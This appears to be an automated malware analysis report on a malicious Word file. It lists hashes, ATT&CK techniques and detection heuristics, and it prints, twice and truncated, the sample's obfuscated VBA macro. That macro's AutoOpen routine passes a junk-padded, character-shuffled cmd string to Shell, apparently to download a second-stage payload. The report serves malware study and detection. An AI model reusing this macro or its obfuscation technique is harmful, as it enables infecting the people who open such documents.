Office (OLE) malware analysis — malicious · 618c0d614fe0590e

MALICIOUS

Office (OLE)

143.8 KB Created: 2018-08-13 10:51:00 Authoring application: Microsoft Office Word First seen: 2018-08-26

MD5: 72c63f5523bc1551658bbddbaa492ea2 SHA-1: a9f243a4899ecb6ed5e5137192d0e92705e1982d SHA-256: 618c0d614fe0590eed529dfec0f59941cd054b034a9e7eee11e95d0cdaa3df74

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro attempts to execute a command that appears to be constructing a URL and downloading a second-stage payload. The ClamAV detection and heuristic firings strongly indicate a downloader family.

Heuristics 5

ClamAV: Doc.Downloader.Valyria-6666962-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Valyria-6666962-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 26500 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	26500 bytes
SHA-256: `236fe789911b5a166d89a3a1045557445889c3e2b8da0b9b9f7a15ad15c61603`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "lPYUSILNazfEz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next TypeName QpOwL TypeName 3760 TypeName zijwk TypeName Sin(crYww) Shell! KeyString(vbKeyC) + aJEtHuwZTwXmaE + EvjkKbkw + GjHGRzotWTv + YzSmtBAsv + oFJiFOrk + EYACuIb + NwwJTnUMwB + RfEjanVWkra + GPrrtdon + PkTvhbkz + isDmnTacoKZ + jRLhri + DPKNTTiojbP + awXIWvpiQjE + EDjPmRUJ + flNdzWVWDZ + RNowmKSYiL + bQrfzjKwb + JYTaE + BjGwpcVj + tUfHfqlpr + dNkzZHHkw, 587441650 - 587441650 TypeName VLbOzM TypeName CInt(FhzUR) End Sub Attribute VB_Name = "pGjMpsr" Function GjHGRzotWTv() On Error Resume Next TypeName Hex(27927 - rpRmh - 6937 + TXzrWW) TypeName EhvJJu OlBjZjcr = "md " + " /V" + ":O " + " " + "/" + CStr(Chr(REwfrYkWzUmRIH + MuhVcuTUzIb + 67 + fXcADzDjmEJbF + WGPlBKboFUXXkd)) + " " + CStr(Chr(wUhRzJQEHXzZ + tXzXzstqOi + 34 + WjjcTCFVMGXf + pKddLBwha)) + " s" TypeName Chr(9679) TypeName CSng(2) qCPcS = "et" + " k" + "px" + "=" + CStr(Chr(NjnqGGDNPm + iEwTULnzSY + 108 + jMlSCjp + DFWSiFAUSja)) + "H" + "Uw" + "rRf" + "za" TypeName Rnd(pEvzRs) TypeName Tan(4) QksPHFinw = "p" + "aiN" + "z" + CStr(Chr(wYOidVnBHpvk + VkKfzitbwaBqFm + 67 + oKzzNME + TSiwQah)) + "q" + "Hfu" + ":D" + "o" + CStr(Chr(ijHEdbsX + jnQAVGBlnJjJj + 99 + dLOfizUStIw + jWFpmPoRDRIp)) + "(4Y" + "Q0" + "S" + "." TypeName Sgn(MmzXLr) TypeName CStr(wkYCRI * EGjGp) TypeName Log(69) hCpEP = "1," + "x" + "k" + "}$" + ")" + " s" + "6dK" + "=" + "m" + "n5/" + "+y" TypeName Chr(27) TypeName ObCadL SirqO = "gb" + "W-" + "Te" + "P\v" + "2" + "t" + "j" + "{" + "78M" + "h@;" + "B" TypeName NnEZvB TypeName Hex(qMGHRB) TypeName CDate(VIJmi) dtAQIhNsWW = "O'" + "F" + "Z&&" + " " + " f" + "o" + "r " TypeName PwLJkf TypeName 4 TypeName Sqr(465552189) tiImmVnMLN = "%" + "G i" + "n " + " ( " + " 9," + " " + " " + "2" + "1" + " " + " " + " ," + " " GjHGRzotWTv = OlBjZjcr + qCPcS + QksPHFinw + hCpEP + SirqO + dtAQIhNsWW + tiImmVnMLN TypeName tSXNYz TypeName 211719404 End Function Function YzSmtBAsv() On Error Resume Next TypeName 5 TypeName ChrB(cNzMM + GfnKuA) Nwzowhstc = " " + " " + "3" + ", " + " " + "54" TypeName Atn(22788 + pUUhMW) TypeName Oct(jfDWc) jEbtV = " " + ", " + " " + " 4" + " " + "," + " " TypeName Hex(pUVCa) TypeName Chr(zBfAwY * 18273) TypeName kBjSmw WsLObzUVC = " " + " 3" + "8, " + " " + " 65" + "," + " " + "5" + "4 ," TypeName CDbl(sVZTQ) TypeName 4782 ZZZpVzQdV = "0 ," + " " + "0," + "37 " + " " + ",3" + "5 ," + " " + " 9 " + " , " TypeName 83 TypeName HBkzjk TypeName Atn(706) tmKzZwZVq = " " + "2" + "5" + " " + " " + " ," + " " + "53 " + " " + " " + ", " TypeName 16717671 TypeName CInt(62764 - qvLvBh * jjKCiF * GzEfk) llNzMWr = " " + "42 " + " " + ", " + " 44" + " " + " " + ", 5" + "4," TypeName Atn(UffwK / SjZMla) TypeName 380893470 TypeName Sin(Bjasnl) aJilYWJoJl = " 3" + " " + " " + "," + "5" + "2" + " ,2" + "1" + " " + ", " + " " + "5" TypeName NfNZj TypeName Sqr(64990 / mowrJb - 19353 - JLapu) TypeName 543 opXwDIa = "0" + " ," + " 60" + " ," + " " + " " + "54 " + " " + " " + " " + ", " + " " + "22 " TypeName 8714 TypeName Atn(25291 * zuvNv * 31279 / KNwVwi) EEklTR = " " + "," + " 59" + " " + " ," + "3" + "7 " + " " + "," + " 12" + "," + " " TypeName 747 TypeName ARrtiR RFLAS = " 54" + ", " + " " + " " + "59" + " " + ", 2" + "9,5" + "1,5" + "4,5" + "0" + " " + " " TypeName Fix(hvAOAC) TypeName Rnd(FFwRzO) TypeName CSng(MjOuOv) LCPbX = ", " + " " + "14" + " ,0" + " " + " , " + "11," + " " + "54" + " " + " " TypeName WLPzVO TypeName CLng(mIVHS / jAVKpM) TypeName Cos(HNozXH) Ipanlrub = ", " + " " + " 44" + "," + " " + " " TypeName Round(681) TypeName CByte(jkwMF / jtDiu / 86264 * qSlwtA) TypeName Tan ... (truncated)

SHA-256: 236fe789911b5a166d89a3a1045557445889c3e2b8da0b9b9f7a15ad15c61603

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "lPYUSILNazfEz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName QpOwL
   TypeName 3760
   TypeName zijwk
   TypeName Sin(crYww)
Shell! KeyString(vbKeyC) + aJEtHuwZTwXmaE + EvjkKbkw + GjHGRzotWTv + YzSmtBAsv + oFJiFOrk + EYACuIb + NwwJTnUMwB + RfEjanVWkra + GPrrtdon + PkTvhbkz + isDmnTacoKZ + jRLhri + DPKNTTiojbP + awXIWvpiQjE + EDjPmRUJ + flNdzWVWDZ + RNowmKSYiL + bQrfzjKwb + JYTaE + BjGwpcVj + tUfHfqlpr + dNkzZHHkw, 587441650 - 587441650
   TypeName VLbOzM
   TypeName CInt(FhzUR)
End Sub


Attribute VB_Name = "pGjMpsr"
Function GjHGRzotWTv()
On Error Resume Next
TypeName Hex(27927 - rpRmh - 6937 + TXzrWW)
   TypeName EhvJJu
OlBjZjcr = "md " + " /V" + ":O " + "   " + "/" + CStr(Chr(REwfrYkWzUmRIH + MuhVcuTUzIb + 67 + fXcADzDjmEJbF + WGPlBKboFUXXkd)) + "  " + CStr(Chr(wUhRzJQEHXzZ + tXzXzstqOi + 34 + WjjcTCFVMGXf + pKddLBwha)) + "  s"
TypeName Chr(9679)
   TypeName CSng(2)
qCPcS = "et" + " k" + "px" + "=" + CStr(Chr(NjnqGGDNPm + iEwTULnzSY + 108 + jMlSCjp + DFWSiFAUSja)) + "H" + "Uw" + "rRf" + "za"
TypeName Rnd(pEvzRs)
   TypeName Tan(4)
QksPHFinw = "p" + "aiN" + "z" + CStr(Chr(wYOidVnBHpvk + VkKfzitbwaBqFm + 67 + oKzzNME + TSiwQah)) + "q" + "Hfu" + ":D" + "o" + CStr(Chr(ijHEdbsX + jnQAVGBlnJjJj + 99 + dLOfizUStIw + jWFpmPoRDRIp)) + "(4Y" + "Q0" + "S" + "."
TypeName Sgn(MmzXLr)
   TypeName CStr(wkYCRI * EGjGp)
   TypeName Log(69)
hCpEP = "1," + "x" + "k" + "}$" + ")" + " s" + "6dK" + "=" + "m" + "n5/" + "+y"
TypeName Chr(27)
   TypeName ObCadL
SirqO = "gb" + "W-" + "Te" + "P\v" + "2" + "t" + "j" + "{" + "78M" + "h@;" + "B"
TypeName NnEZvB
   TypeName Hex(qMGHRB)
   TypeName CDate(VIJmi)
dtAQIhNsWW = "O'" + "F" + "Z&&" + " " + " f" + "o" + "r  "
TypeName PwLJkf
   TypeName 4
   TypeName Sqr(465552189)
tiImmVnMLN = "%" + "G i" + "n " + " ( " + " 9," + " " + " " + "2" + "1" + "  " + " " + " ," + "  "
GjHGRzotWTv = OlBjZjcr + qCPcS + QksPHFinw + hCpEP + SirqO + dtAQIhNsWW + tiImmVnMLN
   TypeName tSXNYz
   TypeName 211719404
End Function
Function YzSmtBAsv()
On Error Resume Next
TypeName 5
   TypeName ChrB(cNzMM + GfnKuA)
Nwzowhstc = " " + " " + "3" + ", " + " " + "54"
TypeName Atn(22788 + pUUhMW)
   TypeName Oct(jfDWc)
jEbtV = "   " + ", " + " " + "  4" + "  " + "," + " "
TypeName Hex(pUVCa)
   TypeName Chr(zBfAwY * 18273)
   TypeName kBjSmw
WsLObzUVC = " " + "  3" + "8, " + "  " + " 65" + "," + "  " + "5" + "4 ,"
TypeName CDbl(sVZTQ)
   TypeName 4782
ZZZpVzQdV = "0 ," + " " + "0," + "37 " + " " + ",3" + "5 ," + "   " + " 9 " + " , "
TypeName 83
   TypeName HBkzjk
   TypeName Atn(706)
tmKzZwZVq = " " + "2" + "5" + "  " + " " + " ," + "   " + "53 " + " " + "  " + ",  "
TypeName 16717671
   TypeName CInt(62764 - qvLvBh * jjKCiF * GzEfk)
llNzMWr = " " + "42 " + "   " + ", " + " 44" + "  " + " " + ", 5" + "4,"
TypeName Atn(UffwK / SjZMla)
   TypeName 380893470
   TypeName Sin(Bjasnl)
aJilYWJoJl = "  3" + " " + " " + "," + "5" + "2" + " ,2" + "1" + " " + ", " + "  " + "5"
TypeName NfNZj
   TypeName Sqr(64990 / mowrJb - 19353 - JLapu)
   TypeName 543
opXwDIa = "0" + " ," + " 60" + "  ," + " " + " " + "54 " + " " + " " + " " + ", " + "   " + "22 "
TypeName 8714
   TypeName Atn(25291 * zuvNv * 31279 / KNwVwi)
EEklTR = "   " + "," + " 59" + " " + " ," + "3" + "7 " + " " + "," + " 12" + "," + " "
TypeName 747
   TypeName ARrtiR
RFLAS = " 54" + ", " + " " + "  " + "59" + "   " + ", 2" + "9,5" + "1,5" + "4,5" + "0" + " " + "   "
TypeName Fix(hvAOAC)
   TypeName Rnd(FFwRzO)
   TypeName CSng(MjOuOv)
LCPbX = ",  " + " " + "14" + " ,0" + " " + " , " + "11," + " " + "54" + " " + "   "
TypeName WLPzVO
   TypeName CLng(mIVHS / jAVKpM)
   TypeName Cos(HNozXH)
Ipanlrub = ",  " + " " + " 44" + "," + "   " + " "
TypeName Round(681)
   TypeName CByte(jkwMF / jtDiu / 86264 * qSlwtA)
   TypeName Tan
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.